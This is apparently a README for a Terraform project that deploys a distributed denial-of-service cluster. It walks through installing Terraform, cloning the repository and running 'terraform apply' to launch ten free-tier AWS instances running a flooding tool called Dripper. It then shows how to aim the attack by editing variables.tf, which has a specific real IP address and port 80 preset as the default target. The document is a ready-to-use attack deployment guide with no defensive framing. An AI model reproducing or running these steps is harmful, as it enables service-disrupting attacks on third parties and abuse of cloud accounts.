# _Autoscaling group with terraform_

required: 

- terraform 
- aws account
- linux

### _Install Terraform_

```shell
$ sudo apt-get update && sudo apt-get install -y gnupg software-properties-common curl

$ curl -fsSL https://apt.releases.hashicorp.com/gpg | sudo apt-key add -

$ sudo apt-add-repository "deb [arch=amd64] https://apt.releases.hashicorp.com $(lsb_release -cs) main"

$ sudo apt-get update && sudo apt-get install terraform
```

Verify the installation:

```shell
$ terraform -help
Usage: terraform [-version] [-help] <command> [args]

The available commands for execution are listed below.
The most common, useful commands are shown first, followed by
less common or more advanced commands. If you're just getting
started with Terraform, stick with the common commands. For the
other commands, please read the help and docs before usage.
```

### _Create AWS account_

https://aws.amazon.com/resources/create-account/

### _Run project_

In order to deploy the infrastructure right in your cloud, you need to run a number of these commands

```shell
$ git clone https://gitlab.com/unrealengine/ddos_cluster_tf.git

$ cd ddos_cluster_tf/stage

$ terraform init

$ terraform apply 
```

After these steps, you will have 10 instances of the t2.micro type that are included in the free tier

Dripper is running in these instances
To pass it the hostname and port number you need to go to this file:

```EC2/variables.tf```

Then find the following lines in this file

```shell
variable "host" {
  default = "85.118.181.8"
}

variable "port" {
  default = "80"
}
```

To destroy everything created, you need to enter the command
```shell
$ terraform destroy
```